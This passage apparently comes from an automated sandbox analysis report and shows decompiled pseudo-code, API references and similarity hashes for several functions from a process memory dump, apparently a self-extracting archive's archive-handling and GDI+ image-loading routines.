Function 00179B0F, Relevance: 3.0, APIs: 2, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00179B0F(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0x194670;
				if(_a8 == 0) {
					L0017E22C(); // executed
				} else {
					L0017E232();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x00179b12
0x00179b14
0x00179b16
0x00179b19
0x00179b1c
0x00179b24
0x00179b25
0x00179b28
0x00179b2e
0x00179b37
0x00179b30
0x00179b30
0x00179b30
0x00179b3c
0x00179b42
0x00179b4b

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00179B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00179B37

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 6c3ed6bb14c329599246d3edb4471af53e3c0e31c66dd0e7256854ed5360f743
Instruction ID: c7d8c45e0b5509a2c13c21f90a10d1e3db29a87161fcac3013faf368ab140362
Opcode Fuzzy Hash: 6c3ed6bb14c329599246d3edb4471af53e3c0e31c66dd0e7256854ed5360f743
Instruction Fuzzy Hash: 38E0ED71905218EBCB10DF98D501A99B7FCEB09321F10C09BEC9993301E7716E049B91

Uniqueness

Uniqueness Score: -1.00%

Function 0018215C, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0018215C(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E0018329A(__eflags, E001820A0); // executed
				 *0x19e680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00183348(__eflags, _t1, 0x1c1054);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E0018218F(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00182161
0x00182166
0x0018216f
0x0018217a
0x00182180
0x00182181
0x00182183
0x0018218e
0x00182185
0x00182185
0x00000000
0x00182185
0x00182171
0x00182171
0x00182173
0x00182173

APIs

Part of subcall function 0018329A: try_get_function.LIBVCRUNTIME ref: 001832AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0018217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00182185

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 2c3e59fa8c38af0ee0a9a0552f49a5435aa47f4b4d56f03a7d8dda587dcd476d
Instruction ID: 7ef1b15d068aae2fc02779d3a9fb2ff3cecafcbe42cd271927819c28b8536e48
Opcode Fuzzy Hash: 2c3e59fa8c38af0ee0a9a0552f49a5435aa47f4b4d56f03a7d8dda587dcd476d
Instruction Fuzzy Hash: 17D0A73414430128680936B0688A5A813845B72FB07F00746FA30850D1EF7083406F11

Uniqueness

Uniqueness Score: -1.00%

Function 0017DC67, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E0017DC67(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t5;
				intOrPtr _t8;
				signed int _t9;
				void* _t16;
				void* _t20;
				signed int _t26;

				_t20 = __esi;
				_t16 = __ecx;
				if(( *0x195560 & 0x00001000) == 0) {
					return _t5;
				} else {
					E0017DD15(__ecx, __esi);
					_t8 =  *0x1c0ce0 + 1;
					 *0x1c0ce0 = _t8;
					if(_t8 == 1) {
						E0017DE67(4, 0x1c0ce4); // executed
					}
					_t24 = _t26;
					_push(_t16);
					_t9 =  *0x19e668; // 0xd6971696
					_v8 = _t9 ^ _t26;
					if(E0017DC9A() == 0) {
						 *0x1c0cdc = 0;
					} else {
						 *0x193260(0x1c0cdc, _t20);
						 *((intOrPtr*)( *0x1c0cd8))();
					}
					return E0017EC4A(_v8 ^ _t24);
				}
			}

0x0017dc67
0x0017dc67
0x0017dc71
0x0017dc99
0x0017dc73
0x0017dc73
0x0017dc7d
0x0017dc7e
0x0017dc86
0x0017dc8f
0x0017dc8f
0x0017df12
0x0017df14
0x0017df15
0x0017df1c
0x0017df26
0x0017df41
0x0017df28
0x0017df36
0x0017df3c
0x0017df3e
0x0017df58
0x0017df58

APIs

DloadLock.DELAYIMP ref: 0017DC73
DloadProtectSection.DELAYIMP ref: 0017DC8F

Part of subcall function 0017DE67: DloadObtainSection.DELAYIMP ref: 0017DE77

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: 194c0b548b5105189385ef55e9979b3d2d950039a87449adeeb9f19bf607570a
Instruction ID: b6e0d1cb18d0b1b23bf4e4603db4e93066773be78c4edd6be20aab0e51c16922
Opcode Fuzzy Hash: 194c0b548b5105189385ef55e9979b3d2d950039a87449adeeb9f19bf607570a
Instruction Fuzzy Hash: 69D01270100208CAD317EB64B986B1C3674BF28744F658689F15DD78A5DFF98CC1C619

Uniqueness

Uniqueness Score: -1.00%

Function 001612E6, Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001612E6(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x001612ed
0x00161302
0x00161308

APIs

GetDlgItem.USER32(?,?), ref: 001612FB
ShowWindow.USER32(00000000), ref: 00161302

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 0549a32f05501cb2b84764dd463d0b979adcb99ad2b29a363c91c1993989de2c
Instruction ID: 8fc297560925fa61911db44b13d41aa1a28c3cd0b7fbebc07da7e9fcb3a8668b
Opcode Fuzzy Hash: 0549a32f05501cb2b84764dd463d0b979adcb99ad2b29a363c91c1993989de2c
Instruction Fuzzy Hash: BBC01272058200BFCB010BB0DC09D2FBFA8EBA4212F09C908F2A5C0060C638C090DB11

Uniqueness

Uniqueness Score: -1.00%

Function 001619A6, Relevance: 1.8, APIs: 1, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E001619A6(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t140;
				intOrPtr _t146;
				signed int _t147;
				signed int _t148;
				void* _t151;
				signed int _t156;
				signed int _t160;
				void* _t165;
				void* _t167;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t174;
				signed int _t184;
				void* _t185;
				signed int _t187;
				char* _t202;
				intOrPtr _t203;
				signed int _t204;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t217;
				char* _t218;
				intOrPtr _t219;
				void* _t220;
				void* _t227;
				void* _t229;

				_t213 = __edx;
				_t174 = __ecx;
				E0017E28C(E00191CB9, _t229);
				_t172 = _t174;
				_t215 = _t172 + 0x21f8;
				 *((char*)(_t172 + 0x6cbc)) = 0;
				 *((char*)(_t172 + 0x6cc4)) = 0;
				 *0x193260(_t215, 7, _t214, _t220, _t171);
				if( *( *( *_t172 + 0xc))() == 7) {
					_t222 = 0;
					 *(_t172 + 0x6cc0) = 0;
					_t103 = E00161DA8(_t215, 7);
					__eflags = _t103;
					if(_t103 == 0) {
						E0016709D(_t229 - 0x38, 0x200000);
						 *(_t229 - 4) = 0;
						 *0x193260();
						_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
						 *((intOrPtr*)(_t229 - 0x18)) = _t107;
						 *0x193260( *((intOrPtr*)(_t229 - 0x38)),  *((intOrPtr*)(_t229 - 0x34)) + 0xfffffff0);
						_t109 =  *( *_t172 + 0xc)();
						_t184 = _t109;
						_t222 = 0;
						 *(_t229 - 0x14) = _t184;
						__eflags = _t184;
						if(_t184 <= 0) {
							L22:
							__eflags =  *(_t172 + 0x6cc0);
							_t185 = _t229 - 0x38;
							if( *(_t172 + 0x6cc0) != 0) {
								_t35 = _t229 - 4; // executed
								 *_t35 =  *(_t229 - 4) | 0xffffffff;
								__eflags =  *_t35;
								E001615A0(_t185); // executed
								L25:
								_t111 =  *(_t172 + 0x6cb0);
								__eflags = _t111 - 4;
								if(__eflags != 0) {
									__eflags = _t111 - 3;
									if(_t111 != 3) {
										 *((intOrPtr*)(_t172 + 0x2200)) = 7;
										L32:
										 *((char*)(_t229 - 0xd)) = 0;
										__eflags = E00163AAC(_t172, _t213, _t222);
										 *(_t229 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t115 =  *((intOrPtr*)(_t229 - 0xd));
											L39:
											_t187 =  *((intOrPtr*)(_t172 + 0x6cc5));
											__eflags = _t187;
											if(_t187 == 0) {
												L41:
												__eflags =  *((char*)(_t172 + 0x6cc4));
												if( *((char*)(_t172 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t187;
													if(__eflags == 0) {
														E00166DC1(__eflags, 0x1b, _t172 + 0x24);
													}
													__eflags =  *((char*)(_t229 + 8));
													if( *((char*)(_t229 + 8)) == 0) {
														goto L1;
													} else {
														L46:
														__eflags =  *(_t229 - 0xe);
														 *((char*)(_t172 + 0x6cb6)) =  *((intOrPtr*)(_t172 + 0x2224));
														if( *(_t229 - 0xe) == 0) {
															L68:
															__eflags =  *((char*)(_t172 + 0x6cb5));
															if( *((char*)(_t172 + 0x6cb5)) == 0) {
																L70:
																E0016FE56(_t172 + 0x6cfa, _t172 + 0x24, 0x800);
																L71:
																_t116 = 1;
																L72:
																 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
																return _t116;
															}
															__eflags =  *((char*)(_t172 + 0x6cb9));
															if( *((char*)(_t172 + 0x6cb9)) == 0) {
																goto L71;
															}
															goto L70;
														}
														__eflags =  *((char*)(_t172 + 0x21e0));
														if( *((char*)(_t172 + 0x21e0)) == 0) {
															L49:
															 *0x193260();
															_t227 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
															_t217 = _t213;
															 *((intOrPtr*)(_t229 - 0x18)) =  *((intOrPtr*)(_t172 + 0x6ca0));
															 *(_t229 - 0x14) =  *(_t172 + 0x6ca4);
															 *((intOrPtr*)(_t229 - 0x1c)) =  *((intOrPtr*)(_t172 + 0x6ca8));
															 *((intOrPtr*)(_t229 - 0x20)) =  *((intOrPtr*)(_t172 + 0x6cac));
															 *((intOrPtr*)(_t229 - 0x24)) =  *((intOrPtr*)(_t172 + 0x21dc));
															while(1) {
																_t127 = E00163AAC(_t172, _t213, _t227);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t172 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t172 + 0x6cb5));
																		if( *((char*)(_t172 + 0x6cb5)) == 0) {
																			L65:
																			_t129 = 0;
																			__eflags = 0;
																			L66:
																			 *((char*)(_t172 + 0x6cb9)) = _t129;
																			L67:
																			 *((intOrPtr*)(_t172 + 0x6ca0)) =  *((intOrPtr*)(_t229 - 0x18));
																			 *(_t172 + 0x6ca4) =  *(_t229 - 0x14);
																			 *((intOrPtr*)(_t172 + 0x6ca8)) =  *((intOrPtr*)(_t229 - 0x1c));
																			 *((intOrPtr*)(_t172 + 0x6cac)) =  *((intOrPtr*)(_t229 - 0x20));
																			 *((intOrPtr*)(_t172 + 0x21dc)) =  *((intOrPtr*)(_t229 - 0x24));
																			 *0x193260(_t227, _t217, 0);
																			 *( *( *_t172 + 0x10))();
																			goto L68;
																		}
																		__eflags =  *((char*)(_t172 + 0x3318));
																		if( *((char*)(_t172 + 0x3318)) != 0) {
																			goto L65;
																		}
																		_t129 = 1;
																		goto L66;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L67;
																	}
																	L59:
																	E00161EDA(_t172);
																	continue;
																}
																__eflags =  *((char*)(_t172 + 0x6cb5));
																if( *((char*)(_t172 + 0x6cb5)) == 0) {
																	L55:
																	_t140 = 0;
																	__eflags = 0;
																	L56:
																	 *((char*)(_t172 + 0x6cb9)) = _t140;
																	goto L59;
																}
																__eflags =  *((char*)(_t172 + 0x5668));
																if( *((char*)(_t172 + 0x5668)) != 0) {
																	goto L55;
																}
																_t140 = 1;
																goto L56;
															}
															goto L67;
														}
														__eflags =  *((char*)(_t172 + 0x6cbc));
														if( *((char*)(_t172 + 0x6cbc)) != 0) {
															goto L68;
														}
														goto L49;
													}
												}
												__eflags = _t115;
												if(_t115 != 0) {
													goto L46;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t229 + 8));
											if( *((char*)(_t229 + 8)) == 0) {
												goto L1;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t229 - 0xd)) = 0;
										while(1) {
											E00161EDA(_t172);
											_t146 =  *((intOrPtr*)(_t172 + 0x21dc));
											__eflags = _t146 - 1;
											if(_t146 == 1) {
												break;
											}
											__eflags =  *((char*)(_t172 + 0x21e0));
											if( *((char*)(_t172 + 0x21e0)) == 0) {
												L37:
												_t147 = E00163AAC(_t172, _t213, _t222);
												__eflags = _t147;
												_t148 = _t147 & 0xffffff00 | _t147 != 0x00000000;
												 *(_t229 - 0xe) = _t148;
												__eflags = _t148 - 1;
												if(_t148 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t146 - 4;
											if(_t146 == 4) {
												break;
											}
											goto L37;
										}
										_t115 = 1;
										goto L39;
									}
									_t218 = _t172 + 0x21ff;
									_t222 =  *( *_t172 + 0xc);
									 *0x193260(_t218, 1);
									_t151 =  *( *( *_t172 + 0xc))();
									__eflags = _t151 - 1;
									if(_t151 != 1) {
										goto L1;
									}
									__eflags =  *_t218;
									if( *_t218 != 0) {
										goto L1;
									}
									 *((intOrPtr*)(_t172 + 0x2200)) = 8;
									goto L32;
								}
								E00166DC1(__eflags, 0x3c, _t172 + 0x24);
								goto L1;
							}
							E001615A0(_t185);
							goto L1;
						} else {
							goto L6;
						}
						do {
							L6:
							_t202 =  *((intOrPtr*)(_t229 - 0x38)) + _t222;
							__eflags =  *_t202 - 0x52;
							if( *_t202 != 0x52) {
								goto L17;
							}
							_t156 = E00161DA8(_t202, _t109 - _t222);
							__eflags = _t156;
							if(_t156 == 0) {
								L16:
								_t109 =  *(_t229 - 0x14);
								goto L17;
							}
							_t203 =  *((intOrPtr*)(_t229 - 0x18));
							 *(_t172 + 0x6cb0) = _t156;
							__eflags = _t156 - 1;
							if(_t156 != 1) {
								L19:
								_t204 = _t203 + _t222;
								 *(_t172 + 0x6cc0) = _t204;
								_t222 =  *( *_t172 + 0x10);
								 *0x193260(_t204, 0, 0);
								 *( *( *_t172 + 0x10))();
								_t160 =  *(_t172 + 0x6cb0);
								__eflags = _t160 - 2;
								if(_t160 == 2) {
									L21:
									_t222 =  *( *_t172 + 0xc);
									 *0x193260(_t215, 7);
									 *( *( *_t172 + 0xc))();
									goto L22;
								}
								__eflags = _t160 - 3;
								if(_t160 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t222;
							if(_t222 <= 0) {
								goto L19;
							}
							__eflags = _t203 - 0x1c;
							if(_t203 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t229 - 0x14) - 0x1f;
							if( *(_t229 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t165 =  *((intOrPtr*)(_t229 - 0x38)) - _t203;
							__eflags =  *((char*)(_t165 + 0x1c)) - 0x52;
							if( *((char*)(_t165 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1d)) - 0x53;
							if( *((char*)(_t165 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1e)) - 0x46;
							if( *((char*)(_t165 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1f)) - 0x58;
							if( *((char*)(_t165 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t222 = _t222 + 1;
							__eflags = _t222 - _t109;
						} while (_t222 < _t109);
						goto L22;
					}
					 *(_t172 + 0x6cb0) = _t103;
					__eflags = _t103 - 1;
					if(_t103 == 1) {
						_t219 =  *_t172;
						_t222 =  *(_t219 + 0x14);
						 *0x193260(0);
						_t167 =  *( *(_t219 + 0x14))();
						asm("sbb edx, 0x0");
						 *0x193260(_t167 - 7, _t213);
						 *((intOrPtr*)(_t219 + 0x10))();
					}
					goto L25;
				}
				L1:
				_t116 = 0;
				goto L72;
			}

0x001619a6
0x001619a6
0x001619ab
0x001619b4
0x001619bc
0x001619c3
0x001619ca
0x001619d6
0x001619e3
0x001619ee
0x001619f1
0x001619f7
0x001619fc
0x001619fe
0x00161a44
0x00161a4b
0x00161a53
0x00161a5b
0x00161a69
0x00161a6f
0x00161a77
0x00161a7a
0x00161a7c
0x00161a7e
0x00161a81
0x00161a83
0x00161b26
0x00161b26
0x00161b2d
0x00161b30
0x00161b3c
0x00161b3c
0x00161b3c
0x00161b40
0x00161b45
0x00161b45
0x00161b4b
0x00161b4e
0x00161b60
0x00161b63
0x00161b9d
0x00161ba7
0x00161bab
0x00161bb3
0x00161bb8
0x00161bbb
0x00161bbd
0x00161bff
0x00161bff
0x00161c02
0x00161c02
0x00161c08
0x00161c0a
0x00161c16
0x00161c16
0x00161c1d
0x00161c23
0x00161c23
0x00161c25
0x00161c2d
0x00161c2d
0x00161c32
0x00161c36
0x00000000
0x00161c3c
0x00161c3c
0x00161c3c
0x00161c46
0x00161c4c
0x00161d5e
0x00161d5e
0x00161d65
0x00161d70
0x00161d80
0x00161d85
0x00161d85
0x00161d87
0x00161d8d
0x00161d97
0x00161d97
0x00161d67
0x00161d6e
0x00000000
0x00000000
0x00000000
0x00161d6e
0x00161c52
0x00161c59
0x00161c68
0x00161c6f
0x00161c79
0x00161c7b
0x00161c83
0x00161c8c
0x00161c95
0x00161c9e
0x00161ca7
0x00161cf0
0x00161cf2
0x00161cf7
0x00161cf9
0x00000000
0x00000000
0x00161cb3
0x00161cb9
0x00161cbc
0x00161cdf
0x00161ce2
0x00161cfd
0x00161d04
0x00161d14
0x00161d14
0x00161d14
0x00161d16
0x00161d16
0x00161d1c
0x00161d1f
0x00161d28
0x00161d31
0x00161d3a
0x00161d43
0x00161d54
0x00161d5c
0x00000000
0x00161d5c
0x00161d06
0x00161d0d
0x00000000
0x00000000
0x00161d11
0x00000000
0x00161d11
0x00161ce4
0x00161ce7
0x00000000
0x00000000
0x00161ce9
0x00161ceb
0x00000000
0x00161ceb
0x00161cbe
0x00161cc5
0x00161cd5
0x00161cd5
0x00161cd5
0x00161cd7
0x00161cd7
0x00000000
0x00161cd7
0x00161cc7
0x00161cce
0x00000000
0x00000000
0x00161cd2
0x00000000
0x00161cd2
0x00000000
0x00161cfb
0x00161c5b
0x00161c62
0x00000000
0x00000000
0x00000000
0x00161c62
0x00161c36
0x00161c1f
0x00161c21
0x00000000
0x00000000
0x00000000
0x00161c21
0x00161c0c
0x00161c10
0x00000000
0x00000000
0x00000000
0x00161c10
0x00161bbf
0x00161bc1
0x00161bc4
0x00161bc6
0x00161bcb
0x00161bd1
0x00161bd4
0x00000000
0x00000000
0x00161bda
0x00161be1
0x00161bec
0x00161bee
0x00161bf3
0x00161bf5
0x00161bf8
0x00161bfb
0x00161bfd
0x00000000
0x00000000
0x00000000
0x00161bfd
0x00161be3
0x00161be6
0x00000000
0x00000000
0x00000000
0x00161be6
0x00161cac
0x00000000
0x00161cac
0x00161b67
0x00161b70
0x00161b75
0x00161b7d
0x00161b7f
0x00161b82
0x00000000
0x00000000
0x00161b88
0x00161b8b
0x00000000
0x00000000
0x00161b91
0x00000000
0x00161b91
0x00161b56
0x00000000
0x00161b56
0x00161b32
0x00000000
0x00000000
0x00000000
0x00000000
0x00161a89
0x00161a89
0x00161a8c
0x00161a8e
0x00161a91
0x00000000
0x00000000
0x00161a97
0x00161a9c
0x00161a9e
0x00161ada
0x00161ada
0x00000000
0x00161ada
0x00161aa0
0x00161aa3
0x00161aa9
0x00161aac
0x00161ae4
0x00161ae6
0x00161aec
0x00161af2
0x00161af8
0x00161b00
0x00161b02
0x00161b08
0x00161b0b
0x00161b12
0x00161b17
0x00161b1c
0x00161b24
0x00000000
0x00161b24
0x00161b0d
0x00161b10
0x00000000
0x00000000
0x00000000
0x00161b10
0x00161aae
0x00161ab0
0x00000000
0x00000000
0x00161ab2
0x00161ab5
0x00000000
0x00000000
0x00161ab7
0x00161abb
0x00000000
0x00000000
0x00161ac0
0x00161ac2
0x00161ac6
0x00000000
0x00000000
0x00161ac8
0x00161acc
0x00000000
0x00000000
0x00161ace
0x00161ad2
0x00000000
0x00000000
0x00161ad4
0x00161ad8
0x00000000
0x00000000
0x00000000
0x00161add
0x00161add
0x00161ade
0x00161ade
0x00000000
0x00161ae2
0x00161a00
0x00161a06
0x00161a09
0x00161a0f
0x00161a12
0x00161a17
0x00161a1f
0x00161a27
0x00161a2c
0x00161a34
0x00161a34
0x00000000
0x00161a09
0x001619e5
0x001619e5
0x00000000

APIs

__EH_prolog.LIBCMT ref: 001619AB

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 088ff12318faa1b1c7a00819fa9d65d46acfb6f81e02421a69a074dc45f1b57d
Instruction ID: f1569748d7bafda530c9fada3a8ada74ce339e13085a141184ad74b8d8138525
Opcode Fuzzy Hash: 088ff12318faa1b1c7a00819fa9d65d46acfb6f81e02421a69a074dc45f1b57d
Instruction Fuzzy Hash: E2C1A431A04294AFEF15CFA8CC95BAD7BA5EF16304F1C40BADC45DB286CB319964CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00163B3D, Relevance: 1.7, APIs: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00163B3D(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E0017E28C(E00191D16, _t153);
				E0017E360();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E00166DC1(__eflags, 0x1e, _t151 + 0x24);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E0016C926(_t83, _t120);
						_push(_t120);
						E0017187A(_t153 - 0xe6ec, __eflags); // executed
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E00172C42(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E0016AA88(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E0016C9D9(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E001728F1(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E001692E6(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E0016AA56(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E00161F94(__eflags, 0x1f, _t151 + 0x24, _t151 + 0x45f8);
									E00166FC6(0x1a0f50, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E00163E53(_t148);
									}
								}
								L25:
								E00171ACF(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E0016C991(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
